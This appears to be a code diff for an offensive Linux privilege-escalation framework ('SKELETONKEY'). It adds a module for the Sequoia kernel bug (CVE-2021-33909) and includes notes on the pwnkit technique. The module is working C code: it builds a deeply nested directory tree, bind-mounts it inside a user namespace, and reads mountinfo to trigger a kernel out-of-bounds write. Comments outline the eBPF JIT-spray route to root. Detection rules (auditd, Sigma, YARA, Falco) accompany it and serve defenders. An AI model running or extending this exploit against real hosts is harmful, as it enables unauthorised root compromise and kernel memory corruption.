+    .opsec_notes    = "Invokes pkexec with argc==0 so the first envp slot is misread as argv[0]; pkexec's iconv-during-decoding loads attacker .so via dlopen by way of crafted GCONV_PATH + CHARSET env vars. Builds a gconv payload .so and gconv-modules cache in /tmp/skeletonkey-pwnkit-XXXXXX (compiles via fork/execl of gcc). Audit-visible via execve(/usr/bin/pkexec) with GCONV_PATH and CHARSET set. No network. Cleanup callback removes /tmp/skeletonkey-pwnkit-* (on failure path; on success the exec replaces the process).",
+    .arch_support   = "any",
 };

 void skeletonkey_register_pwnkit(void)
@@ -0,0 +1,761 @@
+/*
+ * sequoia_cve_2021_33909 — SKELETONKEY module
+ *
+ * "Sequoia" (Qualys, July 2021): a size_t conversion bug in
+ * fs/seq_file.c::seq_buf_alloc(). show_mountinfo() passes a `size_t`
+ * total-output size to seq_buf_alloc(), but the internal accounting in
+ * seq_read_iter() uses a signed int for the running buffer offset.
+ * When the mountinfo string the kernel intends to render exceeds
+ * INT_MAX bytes (which is achievable by mounting a deeply-nested path
+ * — Qualys used ~1 MiB of '/' components), the int wraps NEGATIVE.
+ * That negative value then propagates into seq_buf_alloc() where it is
+ * implicitly cast to size_t (huge positive); kmalloc rejects the
+ * allocation, but a fallback path (`m->buf = vmalloc()` after kmalloc
+ * fails) ends up writing a small-but-nonzero number of bytes —
+ * specifically the bytes show_mountinfo wanted to render — at an
+ * offset that is OUT OF BOUNDS of the kernel stack buffer
+ * seq_read_iter held.
+ *
+ * Net effect: an unprivileged read(/proc/self/mountinfo) writes
+ * attacker-controlled bytes (the rendered mountinfo string for our
+ * deeply-nested bind mount) to a kernel-stack-adjacent location.
+ * Qualys's chain converted this into LPE by spraying eBPF JIT'd
+ * programs (one of two known weaponisations; userfaultfd + FUSE
+ * shadow-mount is the other) so the OOB write lands inside an
+ * executable JIT page → controlled RIP → ROP → cred swap.
+ *
+ * Reference: https://www.qualys.com/2021/07/20/cve-2021-33909/sequoia-local-privilege-escalation-linux.txt
+ *
+ * Discovered by Qualys (Bharat Jogi et al.), July 2021. Famous for
+ * being the first widely-disclosed Linux LPE that turned a sub-page
+ * out-of-bounds write into reliable root via the eBPF-JIT-spray
+ * primitive — that technique has shown up in every "linux mm slab OOB
+ * → JIT spray" public PoC since.
+ *
+ * STATUS: 🟡 PRIMITIVE.
+ *
+ *   detect()  — version-range + userns reachability gate, refuses on
+ *               patched / unreachable hosts. Mainline fix is commit
+ *               8cae8cd89f05 ("seq_file: disallow extremely large seq
+ *               buffer allocations") landing in 5.13.4 / 5.10.52 /
+ *               5.4.134.
+ *
+ *   exploit() — full unshare+userns+mountns reach, builds a ~5000-level
+ *               nested directory tree under /tmp/skeletonkey-sequoia/,
+ *               bind-mounts the deepest leaf back over itself to
+ *               amplify the mountinfo string length, chdir's into the
+ *               leaf, and then open+read /proc/self/mountinfo to fire
+ *               the bug. Witnesses (mountinfo byte count, dmesg
+ *               best-effort) are written to /tmp/skeletonkey-sequoia.log.
+ *               We do NOT attempt the eBPF-JIT-spray weaponisation —
+ *               that is a substantial subsystem (sock_filter program
+ *               build + BPF_PROG_LOAD + JIT layout reasoning + per-
+ *               kernel cred offsets) and would be fabricated on any
+ *               kernel we have not empirically tested.
+ *
+ *   --full-chain — STUB. Prints the offset-help message and returns
+ *               EXPLOIT_FAIL. The continuation roadmap is spelled out
+ *               at the bottom of exploit() so the reader can see
+ *               exactly what's missing.
+ *
+ *   On a *vulnerable* host this module reliably triggers the OOB
+ *   write. On a *patched* host (which is every distro shipping
+ *   ≥5.13.4 / ≥5.10.52 / ≥5.4.134) detect() refuses and exploit()
+ *   returns SKELETONKEY_OK without entering the userns.
+ *
+ * Affected: kernel-since-forever (the int-vs-size_t bug has been
+ * present since the seq_file rewrite c. 2.6.x; Qualys reports it
+ * exploitable on every distro they checked back to 2014).
+ *   Mainline fix: 8cae8cd89f05 (Jul 20 2021) — lands in 5.13.4
+ *   5.13.x : K >= 5.13.4
+ *   5.10.x : K >= 5.10.52
+ *   5.4.x  : K >= 5.4.134
+ *
+ * Preconditions:
+ *   - Unprivileged user_ns + mount-ns (to get CAP_SYS_ADMIN inside
+ *     userns for the bind-mount; the deeply-nested mkdir itself doesn't
+ *     need privileges, but the amplification mount does)
+ *   - ~1 MiB of cumulative path length under /tmp (≈5000 levels at
+ *     200-char component name — well within tmpfs default inode budget)
+ *   - /proc/self/mountinfo readable (it is, on everything we target)
+ *
+ * Coverage rationale: 2021 fs/seq_file-class bug. Different family
+ * than our netfilter-heavy and mm-heavy modules — broadens the corpus
+ * shape. Important historical primitive (eBPF JIT spray adopted from
+ * Sequoia chain into many later exploits).
+ */
+
+#include "skeletonkey_modules.h"
+#include "../../core/registry.h"
+#include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+#include "../../core/host.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/stat.h>
+
+#ifdef __linux__
+#  include <sched.h>
+#  include <sys/mount.h>
+#  include <sys/syscall.h>
+#  include <linux/sched.h>
+#endif
+
+/* macOS clangd lacks the Linux mount/syscall headers — guard fallbacks. */
+#ifndef CLONE_NEWUSER
+#define CLONE_NEWUSER 0x10000000
+#endif
+#ifndef CLONE_NEWNS
+#define CLONE_NEWNS   0x00020000
+#endif
+#ifndef MS_BIND
+#define MS_BIND       0x1000
+#endif
+
+/* --- kernel-range table -------------------------------------------- */
+
+static const struct kernel_patched_from sequoia_patched_branches[] = {
+    {5,  4, 134},
+    {5, 10,  52},
+    {5, 13,   4},
+    {5, 14,   0},   /* mainline */
+};
+
+static const struct kernel_range sequoia_range = {
+    .patched_from   = sequoia_patched_branches,
+    .n_patched_from = sizeof(sequoia_patched_branches) /
+                      sizeof(sequoia_patched_branches[0]),
+};
+
+/* --- tunables ------------------------------------------------------- */
+/*
+ * Qualys's PoC uses ~1 million bytes of path. With a 256-byte component
+ * name we need ~4096 levels; with 200 we need ~5120. We pick 5000 / 200
+ * which gives a generous margin and stays well under tmpfs's inode
+ * default cap on modern distros.
+ *
+ * The component name is intentionally an A-fill; the kernel renders it
+ * verbatim into mountinfo so this is what propagates into the OOB
+ * write. (For the JIT-spray weaponisation the bytes would be a crafted
+ * stub; we're not doing that here — we just want to drive the buggy
+ * size_t cast.)
+ */
+#define SEQ_BASE_DIR          "/tmp/skeletonkey-sequoia"
+#define SEQ_NESTED_LEVELS     5000
+#define SEQ_COMPONENT_LEN     200      /* chars per directory component */
+#define SEQ_LOG_PATH          "/tmp/skeletonkey-sequoia.log"
+
+/* --- userns reach helpers ------------------------------------------- */
+
+static bool write_file(const char *path, const char *s)
+{
+    int fd = open(path, O_WRONLY);
+    if (fd < 0) return false;
+    ssize_t n = write(fd, s, strlen(s));
+    close(fd);
+    return n == (ssize_t)strlen(s);
+}
+
+#ifdef __linux__
+static bool enter_userns_root(void)
+{
+    uid_t uid = getuid();
+    gid_t gid = getgid();
+    if (unshare(CLONE_NEWUSER | CLONE_NEWNS) < 0) {
+        perror("unshare(NEWUSER|NEWNS)");
+        return false;
+    }
+    /* setgroups=deny is required before gid_map without CAP_SETGID. */
+    if (!write_file("/proc/self/setgroups", "deny")) {
+        /* Some kernels (pre-3.19) don't have setgroups proc file. */
+    }
+    char map[64];
+    snprintf(map, sizeof map, "0 %u 1\n", uid);
+    if (!write_file("/proc/self/uid_map", map)) {
+        perror("write uid_map"); return false;
+    }
+    snprintf(map, sizeof map, "0 %u 1\n", gid);
+    if (!write_file("/proc/self/gid_map", map)) {
+        perror("write gid_map"); return false;
+    }
+    return true;
+}
+#endif
+
+/* --- detect -------------------------------------------------------- */
+
+static skeletonkey_result_t sequoia_detect(const struct skeletonkey_ctx *ctx)
+{
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json) fprintf(stderr, "[!] sequoia: host fingerprint missing kernel version — bailing\n");
+        return SKELETONKEY_TEST_ERROR;
+    }
+
+    /* The bug predates every kernel we'd run on, so there's no
+     * "pre-introduction" cutoff; only patched-or-not matters. */
+    bool patched = kernel_range_is_patched(&sequoia_range, v);
+    if (patched) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] sequoia: kernel %s is patched\n", v->release);
+        }
+        return SKELETONKEY_OK;
+    }
+
+    bool userns_ok = ctx->host->unprivileged_userns_allowed;
+    if (!ctx->json) {
+        fprintf(stderr, "[i] sequoia: kernel %s in vulnerable range\n", v->release);
+        fprintf(stderr, "[i] sequoia: user_ns+mount_ns clone (CAP_SYS_ADMIN gate): %s\n",
+                userns_ok ? "ALLOWED" : "DENIED");
+    }
+
+    if (!userns_ok) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] sequoia: user_ns denied → unprivileged "
+                            "exploit unreachable via bind-mount path\n");
+            fprintf(stderr, "[i] sequoia: bug is still reachable to a "
+                            "process with CAP_SYS_ADMIN — not us\n");
+        }
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    if (!ctx->json) {
+        fprintf(stderr, "[!] sequoia: VULNERABLE — kernel in range AND "
+                        "userns+mountns reachable\n");
+    }
+    return SKELETONKEY_VULNERABLE;
+}
+
+/* --- nested mkdir tree --------------------------------------------- */
+
+#ifdef __linux__
+/*
+ * Build SEQ_NESTED_LEVELS deep nested directories under SEQ_BASE_DIR.
+ * Strategy: chdir() to the parent of each new component, then mkdir
+ * + chdir into the child. This avoids hitting PATH_MAX in mkdir's
+ * argument (PATH_MAX is 4096 on Linux; total path here is ~1 MB —
+ * the kernel resolves it segment-by-segment via chdir's dentry cache).
+ *
+ * Returns the file descriptor pointing at the LEAF directory (so the
+ * caller can fchdir() back to it after we drop privs / do other
+ * setup), or -1 on failure.
+ *
+ * On failure we leave whatever we managed to create behind for
+ * sequoia_cleanup() to mop up.
+ */
+static int build_nested_tree(int *out_levels_built)
+{
+    *out_levels_built = 0;
+
+    /* Ensure base dir exists. We don't care if it already does. */
+    if (mkdir(SEQ_BASE_DIR, 0700) < 0 && errno != EEXIST) {
+        fprintf(stderr, "[-] sequoia: mkdir(%s): %s\n",
+                SEQ_BASE_DIR, strerror(errno));
+        return -1;
+    }
+    if (chdir(SEQ_BASE_DIR) < 0) {
+        fprintf(stderr, "[-] sequoia: chdir(%s): %s\n",
+                SEQ_BASE_DIR, strerror(errno));
+        return -1;
+    }
+
+    /* Component name: SEQ_COMPONENT_LEN bytes of 'A'. The leaf gets a
+     * recognisable terminator so we can spot our mount in mountinfo. */
+    char comp[SEQ_COMPONENT_LEN + 1];
+    memset(comp, 'A', SEQ_COMPONENT_LEN);
+    comp[SEQ_COMPONENT_LEN] = '\0';
+
+    int built = 0;
+    for (int i = 0; i < SEQ_NESTED_LEVELS; i++) {
+        if (mkdir(comp, 0700) < 0 && errno != EEXIST) {
+            fprintf(stderr, "[-] sequoia: mkdir level %d: %s\n",
+                    i, strerror(errno));
+            *out_levels_built = built;
+            return -1;
+        }
+        if (chdir(comp) < 0) {
+            fprintf(stderr, "[-] sequoia: chdir level %d: %s\n",
+                    i, strerror(errno));
+            *out_levels_built = built;
+            return -1;
+        }
+        built++;
+    }
+    *out_levels_built = built;
+
+    /* Open the leaf so the caller can fchdir back here. */
+    int fd = open(".", O_RDONLY | O_DIRECTORY);
+    if (fd < 0) {
+        fprintf(stderr, "[-] sequoia: open(leaf): %s\n", strerror(errno));
+        return -1;
+    }
+    return fd;
+}
+
+/* Bind-mount the leaf onto itself. This creates a new entry in
+ * /proc/self/mountinfo whose path field renders the FULL deeply-
+ * nested path — pushing the total mountinfo string length past the
+ * int-cast boundary. Without the bind mount, mountinfo only lists
+ * the original /tmp mount (a short string).
+ *
+ * Requires CAP_SYS_ADMIN-in-userns (which enter_userns_root gave us). */
+static bool bind_mount_leaf(void)
+{
+    if (mount(".", ".", NULL, MS_BIND, NULL) < 0) {
+        fprintf(stderr, "[-] sequoia: bind-mount(.,.): %s\n", strerror(errno));
+        return false;
+    }
+    return true;
+}
+
+/* Read /proc/self/mountinfo fully, count bytes. Best-effort: returns
+ * the total byte count, or -1 on open failure. On a VULNERABLE kernel
+ * this read triggers the OOB write inside the kernel. On a patched
+ * kernel the kernel returns -ENOMEM (the new safety check rejects
+ * over-large seq_buf allocations). */
+static ssize_t read_mountinfo_and_count(void)
+{
+    int fd = open("/proc/self/mountinfo", O_RDONLY);
+    if (fd < 0) return -1;
+    ssize_t total = 0;
+    char buf[8192];
+    for (;;) {
+        ssize_t n = read(fd, buf, sizeof buf);
+        if (n < 0) {
+            if (errno == EINTR) continue;
+            /* On a patched kernel, the read may fail with ENOMEM
+             * after our crafted mountinfo entry triggers the safety
+             * check. We record the errno via caller's errno read. */
+            close(fd);
+            return -1;
+        }
+        if (n == 0) break;
+        total += n;
+    }
+    close(fd);
+    return total;
+}
+
+/* Best-effort dmesg sample: open /dev/kmsg and read up to N bytes.
+ * On most distros this is root-only, so we just gracefully fail and
+ * note that in the log. */
+static void log_dmesg_tail(FILE *log)
+{
+    int fd = open("/dev/kmsg", O_RDONLY | O_NONBLOCK);
+    if (fd < 0) {
+        fprintf(log, "  dmesg_sample: <not readable: %s>\n", strerror(errno));
+        return;
+    }
+    char buf[2048];
+    ssize_t n = read(fd, buf, sizeof buf - 1);
+    close(fd);
+    if (n <= 0) {
+        fprintf(log, "  dmesg_sample: <no data: %s>\n",
+                n < 0 ? strerror(errno) : "empty");
+        return;
+    }
+    buf[n] = '\0';
+    /* Scan for SEQUOIA-relevant warning shapes; we don't need the
+     * exact match, just record whether anything 'oops/BUG/KASAN'-ish
+     * showed up in the first kmsg page. */
+    bool oops  = strstr(buf, "BUG:")    != NULL ||
+                 strstr(buf, "Oops")    != NULL ||
+                 strstr(buf, "KASAN")   != NULL ||
+                 strstr(buf, "general protection fault") != NULL;
+    fprintf(log, "  dmesg_sample_bytes: %zd\n", n);
+    fprintf(log, "  dmesg_oops_marker:  %s\n", oops ? "yes" : "no");
+}
+#endif /* __linux__ */
+
+/* --- exploit ------------------------------------------------------- */
+
+#ifdef __linux__
+static skeletonkey_result_t sequoia_exploit_linux(const struct skeletonkey_ctx *ctx)
+{
+    /* (R0) refuse without --i-know. */
+    if (!ctx->authorized) {
+        fprintf(stderr, "[-] sequoia: refusing to run exploit without --i-know\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    /* (R1) refuse if already root. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
+        if (!ctx->json) {
+            fprintf(stderr, "[i] sequoia: already root — nothing to escalate\n");
+        }
+        return SKELETONKEY_OK;
+    }
+
+    /* (R2) re-call detect — refuse if not vulnerable. */
+    skeletonkey_result_t pre = sequoia_detect(ctx);
+    if (pre == SKELETONKEY_OK) {
+        fprintf(stderr, "[+] sequoia: kernel not vulnerable; refusing exploit\n");
+        return SKELETONKEY_OK;
+    }
+    if (pre != SKELETONKEY_VULNERABLE) {
+        fprintf(stderr, "[-] sequoia: detect() says not vulnerable; refusing\n");
+        return pre;
+    }
+
+    /* (R3) full-chain: STUB. The Sequoia chain to root needs an
+     * eBPF-JIT-spray subsystem we don't ship — printing the offset
+     * help and refusing is the honest answer. */
+    if (ctx->full_chain) {
+        struct skeletonkey_kernel_offsets off;
+        memset(&off, 0, sizeof off);
+        (void)skeletonkey_offsets_resolve(&off);
+        skeletonkey_offsets_print(&off);
+        skeletonkey_finisher_print_offset_help("sequoia");
+        fprintf(stderr,
+            "[-] sequoia: --full-chain not implemented.\n"
+            "    The Qualys chain converts the stack-OOB write to RIP\n"
+            "    control via eBPF JIT spray: load many sock_filter\n"
+            "    programs, induce the JIT to lay them out at predictable\n"
+            "    kernel-VA pages, then steer the OOB write to overwrite\n"
+            "    the JIT prologue of one program with attacker shellcode\n"
+            "    (cred swap + return). Building that here would mean a\n"
+            "    standalone BPF_PROG_LOAD harness + JIT page-layout\n"
+            "    reasoning + per-kernel cred offsets — a substantial\n"
+            "    subsystem we have not validated empirically.\n"
+            "    See Qualys advisory section 3.1 (eBPF technique) for\n"
+            "    the reference implementation.\n");
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] sequoia: entering userns + mountns\n");
+    }
+
+    /* Fork: keep the deeply-nested mkdir + bind-mount + read confined
+     * to a child process. The parent can then clean up regardless of
+     * how the child terminates. */
+    pid_t child = fork();
+    if (child < 0) { perror("fork"); return SKELETONKEY_TEST_ERROR; }
+
+    if (child == 0) {
+        /* (R4) unshare for userns+mount_ns → CAP_SYS_ADMIN-in-userns. */
+        if (!enter_userns_root()) {
+            _exit(20);
+        }
+
+        /* (R5) Build the deeply-nested directory tree. */
+        int levels_built = 0;
+        int leaf_fd = build_nested_tree(&levels_built);
+        if (leaf_fd < 0) {
+            fprintf(stderr, "[-] sequoia: nested tree build failed at level %d\n",
+                    levels_built);
+            _exit(21);
+        }
+        if (!ctx->json) {
+            fprintf(stderr, "[*] sequoia: built %d-level nested tree under %s\n",
+                    levels_built, SEQ_BASE_DIR);
+        }
+
+        /* (R6) Bind-mount the leaf back over itself. This is what
+         *      pushes the rendered mountinfo string past INT_MAX. */
+        if (!bind_mount_leaf()) {
+            fprintf(stderr, "[-] sequoia: bind-mount failed; cannot amplify "
+                            "mountinfo length\n");
+            close(leaf_fd);
+            _exit(22);
+        }
+        if (!ctx->json) {
+            fprintf(stderr, "[*] sequoia: bind-mount leaf-over-leaf armed\n");
+        }
+
+        /* (R7) chdir back to leaf (we may have changed dirs during
+         *      tree build but we want to ensure mountinfo renders our
+         *      mount point in full). */
+        if (fchdir(leaf_fd) < 0) {
+            fprintf(stderr, "[~] sequoia: fchdir(leaf): %s — continuing\n",
+                    strerror(errno));
+        }
+        close(leaf_fd);
+
+        /* (R8) Trigger: read /proc/self/mountinfo. On a vulnerable
+         *      kernel the int-vs-size_t bug fires inside seq_buf_alloc()
+         *      and the kernel performs an OOB write of show_mountinfo's
+         *      rendered bytes off the end of the seq_read_iter stack
+         *      buffer. We have no in-process arb-write primitive that
+         *      consumes those bytes (that's the eBPF-JIT-spray step
+         *      we don't ship), so we just record the empirical
+         *      witness: did the read succeed? what byte count? did
+         *      dmesg cough up an oops marker? */
+        if (!ctx->json) {
+            fprintf(stderr, "[*] sequoia: firing trigger — "
+                            "read(/proc/self/mountinfo)\n");
+        }
+        errno = 0;
+        ssize_t mi_bytes = read_mountinfo_and_count();
+        int mi_errno = errno;
+
+        FILE *log = fopen(SEQ_LOG_PATH, "w");
+        if (log) {
+            fprintf(log,
+                "sequoia trigger:\n"
+                "  nested_levels       = %d\n"
+                "  component_len       = %d\n"
+                "  total_path_bytes    ~= %lld\n"
+                "  bind_mount_armed    = yes\n"
+                "  mountinfo_read_bytes = %lld\n"
+                "  mountinfo_read_errno = %d (%s)\n",
+                levels_built, SEQ_COMPONENT_LEN,
+                (long long)levels_built * SEQ_COMPONENT_LEN,
+                (long long)mi_bytes,
+                mi_errno, mi_errno ? strerror(mi_errno) : "ok");
+            log_dmesg_tail(log);
+            fprintf(log,
+                "Note: this run did NOT attempt the eBPF-JIT-spray\n"
+                "weaponisation. The OOB write fired inside the kernel\n"
+                "but we do not consume it to control RIP / swap creds.\n"
+                "See module .c for the continuation roadmap.\n");
+            fclose(log);
+        }
+
+        if (!ctx->json) {
+            fprintf(stderr,
+                "[*] sequoia: mountinfo read returned %lld bytes (errno=%d)\n",
+                (long long)mi_bytes, mi_errno);
+            fprintf(stderr,
+                "[*] sequoia: empirical witness logged to %s\n",
+                SEQ_LOG_PATH);
+        }
+
+        /* (R9) Continuation roadmap.
+         *
+         *   TODO(weaponise-jit): spawn the eBPF JIT spray:
+         *     - bpf(BPF_PROG_LOAD, SOCKET_FILTER, ...) many times with
+         *       attacker-chosen byte patterns in the program body
+         *     - the kernel JIT compiles each to a page-aligned executable
+         *       region; bytes from the program body survive into the
+         *       prologue at known offsets
+         *     - tune SEQ_NESTED_LEVELS + SEQ_COMPONENT_LEN so the rendered
+         *       mountinfo string lands the OOB write at the JIT page
+         *       hosting one of our programs
+         *     - the overwritten prologue performs: lookup current task →
+         *       cred → uid=0 → return.
+         *     - execute the (now-attacker-modified) program by attaching
+         *       it to a socket and sending a packet → kernel runs cred
+         *       swap → /bin/sh as root.
+         *
+         *   None of this is implemented today. We exit 30 to flag
+         *   "trigger ran cleanly, no escalation". */
+        _exit(30);
+    }
+
+    /* PARENT */
+    int status = 0;
+    pid_t w = waitpid(child, &status, 0);
+    if (w < 0) { perror("waitpid"); return SKELETONKEY_TEST_ERROR; }
+
+    if (WIFSIGNALED(status)) {
+        int sig = WTERMSIG(status);
+        if (!ctx->json) {
+            fprintf(stderr,
+                "[!] sequoia: exploit child killed by signal %d "
+                "(consistent with OOB write hitting an unmapped page)\n",
+                sig);
+            fprintf(stderr,
+                "[~] sequoia: empirical signal recorded; no cred-overwrite\n"
+                "    primitive — NOT claiming EXPLOIT_OK.\n"
+                "    See %s + dmesg for witnesses.\n", SEQ_LOG_PATH);
+        }
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    if (!WIFEXITED(status)) {
+        fprintf(stderr, "[-] sequoia: child terminated abnormally (status=0x%x)\n",
+                status);
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    int rc = WEXITSTATUS(status);
+    if (rc == 20) return SKELETONKEY_TEST_ERROR;        /* enter_userns failed */
+    if (rc == 21) return SKELETONKEY_PRECOND_FAIL;      /* tree build failed */
+    if (rc == 22) return SKELETONKEY_EXPLOIT_FAIL;      /* bind-mount refused */
+    if (rc != 30) {
+        fprintf(stderr, "[-] sequoia: child failed at stage rc=%d\n", rc);
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] sequoia: trigger ran to completion.\n");
+        fprintf(stderr,
+            "[~] sequoia: stack-OOB write fired but JIT-spray weaponisation\n"
+            "    NOT implemented (per-kernel offsets + BPF subsystem; see\n"
+            "    module .c TODO blocks). Returning EXPLOIT_FAIL per\n"
+            "    verified-vs-claimed.\n");
+    }
+    return SKELETONKEY_EXPLOIT_FAIL;
+}
+#endif /* __linux__ */
+
+static skeletonkey_result_t sequoia_exploit(const struct skeletonkey_ctx *ctx)
+{
+#ifdef __linux__
+    return sequoia_exploit_linux(ctx);
+#else
+    (void)ctx;
+    fprintf(stderr, "[-] sequoia: Linux-only module; cannot run on this host\n");
+    return SKELETONKEY_PRECOND_FAIL;
+#endif
+}
+
+/* --- cleanup ------------------------------------------------------- */
+
+/* Walk back down the nested tree, umounting then rmdir'ing each level.
+ * Best-effort: we don't bail on the first error because partial cleanup
+ * is still useful, and some levels may not have a mount on them (only
+ * the leaf gets bind-mounted in the canonical path). */
+static skeletonkey_result_t sequoia_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json) {
+        fprintf(stderr, "[*] sequoia: cleaning up nested tree + bind mounts\n");
+    }
+#ifdef __linux__
+    /* Try to enter SEQ_BASE_DIR; if it doesn't exist, nothing to do. */
+    int base_fd = open(SEQ_BASE_DIR, O_RDONLY | O_DIRECTORY);
+    if (base_fd < 0) {
+        /* Nothing to clean up — module never ran or already cleaned. */
+        goto log_cleanup;
+    }
+    close(base_fd);
+
+    /* Walk to the leaf via chdir, then rmdir as we walk back out. We
+     * don't know how far we got, so we try the full depth and ignore
+     * ENOENT. The component name is the same at every level. */
+    char comp[SEQ_COMPONENT_LEN + 1];
+    memset(comp, 'A', SEQ_COMPONENT_LEN);
+    comp[SEQ_COMPONENT_LEN] = '\0';
+
+    if (chdir(SEQ_BASE_DIR) < 0) goto log_cleanup;
+
+    int depth = 0;
+    for (int i = 0; i < SEQ_NESTED_LEVELS; i++) {
+        if (chdir(comp) < 0) break;
+        depth++;
+    }
+    /* Best-effort: umount the leaf (we may have bind-mounted it). */
+    (void)umount2(".", MNT_DETACH);
+
+    /* Walk back out, rmdir-ing each level. */
+    for (int i = 0; i < depth; i++) {
+        if (chdir("..") < 0) break;
+        if (rmdir(comp) < 0 && errno != ENOENT && errno != EBUSY) {
+            /* Likely had a mount on it; try MNT_DETACH then rmdir. */
+            (void)umount2(comp, MNT_DETACH);
+            (void)rmdir(comp);
+        }
+    }
+    (void)chdir("/");
+    (void)rmdir(SEQ_BASE_DIR);
+#endif /* __linux__ */
+
+log_cleanup:
+    if (unlink(SEQ_LOG_PATH) < 0 && errno != ENOENT) {
+        /* harmless */
+    }
+    return SKELETONKEY_OK;
+}
+
+/* --- detection rules ----------------------------------------------- */
+
+static const char sequoia_auditd[] =
+    "# Sequoia (CVE-2021-33909) — auditd detection rules\n"
+    "# Trigger shape: mount(2) on /proc namespaces from a userns +\n"
+    "# many many mkdir(2) calls in a tight loop with identical long\n"
+    "# component names. Each individual call is benign — flag the\n"
+    "# *combination*. The deeply-nested mkdir pattern is the strongest\n"
+    "# signal: legitimate workloads don't recurse 5000 levels.\n"
+    "-a always,exit -F arch=b64 -S unshare -k skeletonkey-sequoia-userns\n"
+    "-a always,exit -F arch=b64 -S mount   -k skeletonkey-sequoia-mount\n"
+    "-a always,exit -F arch=b64 -S mkdir   -F success=1 -k skeletonkey-sequoia-mkdir\n"
+    "-a always,exit -F arch=b64 -S mkdirat -F success=1 -k skeletonkey-sequoia-mkdir\n"
+    "# Correlation hint: a process producing >1000 mkdir-key events\n"
+    "# within 5s AND a subsequent skeletonkey-sequoia-mount event is\n"
+    "# the canonical trigger shape.\n";
+
+static const char sequoia_sigma[] =
+    "title: Possible CVE-2021-33909 seq_file size_t-int wrap\n"
+    "id: 2b13d4b9-skeletonkey-sequoia\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects the seq_file OOB-write trigger pattern: unshare\n"
+    "  (CLONE_NEWUSER|CLONE_NEWNS) + a burst of ~5000 mkdir/mkdirat\n"
+    "  syscalls + bind-mount + read(/proc/self/mountinfo). The\n"
+    "  rendered string exceeds INT_MAX, wrapping to negative.\n"
+    "  False positives: unusual; bursts of >1000 mkdir/s are rare in\n"
+    "  normal workloads.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  userns: {type: 'SYSCALL', syscall: 'unshare'}\n"
+    "  mkdir:  {type: 'SYSCALL', syscall: 'mkdir'}\n"
+    "  bind:   {type: 'SYSCALL', syscall: 'mount'}\n"
+    "  condition: userns and mkdir and bind\n"
+    "level: critical\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2021.33909]\n";
+
+static const char sequoia_yara[] =
+    "rule sequoia_cve_2021_33909 : cve_2021_33909 kernel_oob_write\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2021-33909\"\n"
+    "        description = \"Sequoia deep-mountpoint workdir + log breadcrumb\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $work = \"/tmp/skeletonkey-sequoia\" ascii\n"
+    "        $log  = \"/tmp/skeletonkey-sequoia.log\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char sequoia_falco[] =
+    "- rule: Deeply nested mkdir burst + /proc/self/mountinfo read (Sequoia)\n"
+    "  desc: |\n"
+    "    Non-root process reading /proc/self/mountinfo after a burst\n"
+    "    of ~5000 mkdir()s and a bind-mount of the deep leaf. The\n"
+    "    rendered mountinfo string exceeds INT_MAX. CVE-2021-33909.\n"
+    "    False positives: rare; mkdir bursts of this size are not\n"
+    "    seen in normal workloads.\n"
+    "  condition: >\n"
+    "    evt.type = open and fd.name = /proc/self/mountinfo and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    /proc/self/mountinfo read by non-root\n"
+    "    (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [filesystem, mitre_privilege_escalation, T1068, cve.2021.33909]\n";
+
+const struct skeletonkey_module sequoia_module = {
+    .name           = "sequoia",
+    .cve            = "CVE-2021-33909",
+    .summary        = "seq_file size_t overflow → kernel stack OOB write (Qualys Sequoia) — primitive only",
+    .family         = "filesystem",
+    .kernel_range   = "K < 5.13.4 / 5.10.52 / 5.4.134",
+    .detect         = sequoia_detect,
+    .exploit        = sequoia_exploit,
+    .mitigate       = NULL,
+    .cleanup        = sequoia_cleanup,
+    .detect_auditd  = sequoia_auditd,
+    .detect_sigma   = sequoia_sigma,
+    .detect_yara    = sequoia_yara,
+    .detect_falco   = sequoia_falco,
+    .opsec_notes    = "Builds ~5000 nested directories under /tmp/skeletonkey-sequoia (each name 200 'A' chars); enters userns for CAP_SYS_ADMIN; bind-mounts the leaf over itself to amplify the rendered mountinfo string length; reads /proc/self/mountinfo to trigger the int-vs-size_t overflow in seq_buf_alloc(), producing an OOB write of mountinfo bytes off the stack buffer. Artifacts: /tmp/skeletonkey-sequoia/ (deep tree + bind mounts) and /tmp/skeletonkey-sequoia.log (byte count + dmesg sample). Audit-visible via unshare(CLONE_NEWUSER|CLONE_NEWNS) + mount() + burst of ~5000 mkdir/mkdirat. No network. Cleanup callback walks back down the tree, unmounts, removes dirs, unlinks the .log.",
+    .arch_support   = "x86_64+unverified-arm64",
+};
+
+void skeletonkey_register_sequoia(void)
+{
+    skeletonkey_register(&sequoia_module);
+}
@@ -0,0 +1,5 @@
+#ifndef SEQUOIA_SKELETONKEY_MODULES_H
+#define SEQUOIA_SKELETONKEY_MODULES_H
+#include "../../core/module.h"
+extern const struct skeletonkey_module sequoia_module;
+#endif
@@ -72,6 +72,7 @@
 #include "../../core/kernel_range.h"
 #include "../../core/offsets.h"
 #include "../../core/finisher.h"
+#include "../../core/host.h"

